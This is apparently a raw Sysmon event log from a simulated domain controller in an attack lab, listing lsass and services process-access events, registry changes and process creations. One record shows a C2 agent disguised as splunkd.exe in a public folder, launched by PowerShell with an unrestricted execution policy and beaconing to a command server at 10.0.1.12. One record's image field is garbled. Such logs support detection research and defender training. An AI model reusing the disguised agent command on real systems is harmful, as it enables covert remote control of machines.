13:09:37.994{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.994{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.994{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.994{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.994{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.994{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.994{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:37.931{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\GuidBinary Data 12241200x80000000000000001233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-DeleteValue2021-01-14 13:09:37.931{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\Guid 10341000x80000000000000001232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.916{08A6967A-4286-6000-0A00-000000009A01}8441184C:\Windows\system32\services.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.916{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.916{08A6967A-4286-6000-0A00-000000009A01}844924C:\Windows\system32\services.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.921{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.916{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.916{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.916{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.916{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:37.916{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x80000000000000001223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.009{08A6967A-4288-6000-1100-000000009A01}11921460C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:36.994{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.478{08A6967A-428F-6000-2700-000000009A01}24642488C:\Windows\system32\conhost.exe{08A6967A-428F-6000-2600-000000009A01}2308C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.463{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-428F-6000-2700-000000009A01}2464C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.463{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-428F-6000-2600-000000009A01}2308C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.463{08A6967A-4289-6000-1A00-000000009A01}22402804數䠀ऀЀ⺾੒⹩㉒⹩{08A6967A-428F-6000-2600-000000009A01}2308C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13755f|C:\Windows\System32\windows.storage.dll+1371d5|C:\Windows\System32\windows.storage.dll+136cc6|C:\Windows\System32\windows.storage.dll+138138|C:\Windows\System32\windows.storage.dll+136aee|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\shell32.dll+74f4f|C:\Windows\System32\shell32.dll+74ddc|C:\Windows\System32\shell32.dll+74b2c|C:\Windows\System32\shell32.dll+c76a7|C:\Windows\System32\shell32.dll+c7605|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+33903a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+276811|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+acd828|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+271e5f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b56bc|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+3c750a70(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+3c750a70(wow64) 154100x80000000000000001217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.420{08A6967A-428F-6000-2600-000000009A01}2308C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{08A6967A-4289-6000-1A00-000000009A01}2240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 13241300x80000000000000001216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000000) 13241300x80000000000000001212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000001211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000001210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000001209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000001208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000001207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000001206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000001205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:35.447{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-250 11241100x80000000000000001204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localEXE2021-01-14 